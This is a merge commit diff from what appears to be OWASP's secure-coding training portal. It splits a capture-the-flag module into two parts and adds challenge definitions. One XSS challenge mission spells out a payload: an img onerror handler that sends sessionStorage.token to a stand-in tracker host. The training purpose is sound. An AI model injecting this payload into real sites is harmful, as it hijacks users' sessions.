Merge pull request #163 from OWASP/split-second-degree

Split second degree

Author: paul-ion

trainingportal/auth.js

@@ -281,10 +281,11 @@ let processAuthCallback = async(profileId, givenName, familyName, email, cb) =>
             user.email = email;
             let modules = challenges.getModules();
             for(let moduleId in modules){
-                let promise = challenges.verifyModuleCompletion(user, moduleId);
-                promise.catch((err) => {
+                try {
+                    await challenges.verifyModuleCompletion(user, moduleId);
+                } catch (error) {
                     util.log("Error with badge verification.", user);
-                });
+                }
             }
         }
         else{

trainingportal/static/challenges.html

@@ -72,7 +72,7 @@ <h4>Play Link and Instructions</h4>
                                 <br/><br/>
                             </span>
                             <p ng-if="!challenge.playLink">
-                                The play link has been provided to you when solving the previous challenge. 
+                                The play link has been provided to you when solving the previous module or challenge. 
                                 If you have missed it read the challenge description carefully and try to figure out what it is.
                             </p>
                             <span ng-if="!challenge.passed">

trainingportal/static/lessons/blackBelt/definitions.json

@@ -129,15 +129,6 @@
                 "solution":"cwe134.sol.md",
                 "codeBlockIds":["safeMemoryManagement","inputAllowListing"]
             },
-            {
-                "id":"cwe502",
-                "name":"Deserialization of Untrusted Data",
-                "playLink":"/cwe502.jsp",
-                "description": "cwe502.html",
-                "attackGram":"deserialization.png",
-                "solution":"cwe502.sol.md",
-                "codeBlockIds":["enforceSafeDeserialization"]
-            },
             {
                 "id":"quiz",
                 "name":"Quiz", 

trainingportal/static/lessons/modules.json

@@ -30,7 +30,7 @@
         "name":"Black Belt",
         "summary":"Common software security flaws - part 2",
         "description":"Lessons are entry level difficulty aimed at introducing the concepts of vulnerability, exploit and software defense.",
-        "description2":"Includes 14 lessons. Estimated duration 2 hours.",
+        "description2":"Includes 13 lessons. Estimated duration 2 hours.",
         "badgeInfo":{
             "line1":"Secure Coding",
             "line2":"Black Belt",
@@ -39,18 +39,30 @@
         },
         "requiredModules":["greenBelt"]
     },
-    "secondDegreeBlackBelt":{
-        "name":"Second Degree Black Belt",
+    "secondDegreeBlackBelt1":{
+        "name":"Second Degree Black Belt - Part 1",
         "summary":"Cloud software exploitation techniques",
         "description":"Have some fun with this Capture the Flag module which is based on OWASP Top 10. Your goal is to take down the cloud applications used in a worldwide malware campaign.",
         "badgeInfo":{
             "line1":"Secure Coding",
             "line2":"2nd Degree",
             "line3":"Black Belt",
-            "bg":"darkred"
+            "bg":"red"
         },
         "requiredModules":["blackBelt"]
     },
+    "secondDegreeBlackBelt2":{
+        "name":"Second Degree Black Belt - Part 2",
+        "summary":"Cloud software exploitation techniques",
+        "description":"Have some fun with this Capture the Flag module which is based on OWASP Top 10. Your goal is to take down the cloud applications used in a worldwide malware campaign.",
+        "badgeInfo":{
+            "line1":"Secure Coding",
+            "line2":"2nd Degree",
+            "line3":"Black Belt",
+            "bg":"darkred"
+        },
+        "requiredModules":["secondDegreeBlackBelt1"]
+    },
     "redTeam":{
         "name":"Red Team",
         "summary":"Pen-testing tools and techniques",

trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json

@@ -0,0 +1,40 @@
+[
+    {
+        "level":0,
+        "name":"Second Degree Black Belt - Part 1",
+        "challenges":[
+            {
+                "id":"owasp2017misconfig",
+                "name":"Security Misconfiguration", 
+                "playLink":"",
+                "description": "owasp2017misconfig.html",
+                "codeBlockIds":["enforceSafeConfig"],
+                "mission": "Find the secret file."
+            },
+            {
+                "id":"owasp2017sensitive",
+                "name":"Sensitive Data Exposure", 
+                "description": "owasp2017sensitive.html",
+                "attackGram":"missingenc.png",
+                "codeBlockIds":["useStrongDataEncryption"],
+                "mission": "Login as the test user."
+            },
+            {
+                "id":"owasp2017brokenauth",
+                "name":"Broken Authentication & Broken Access Control", 
+                "description": "owasp2017brokenauth.html",
+                "attackGram":"missingauthz.png",
+                "codeBlockIds":["loginBestPractices","principleOfLeastPrivilege","serverSideValidation"],
+                "mission": "View the chat messages."
+            },
+            {
+                "id":"owasp2017xss",
+                "name":"Cross-Site Scripting", 
+                "description": "owasp2017xss.html",
+                "attackGram":"xss.png",
+                "codeBlockIds":["neutralizeOutput","inputAllowListing","requestForgeryPrevention"],
+                "mission":"Alter the html code of the page by inserting the following tag: <img src=bla onerror=\"fetch('https://xss.tracker?token='+sessionStorage.token)\">"
+            }
+        ]
+    }
+]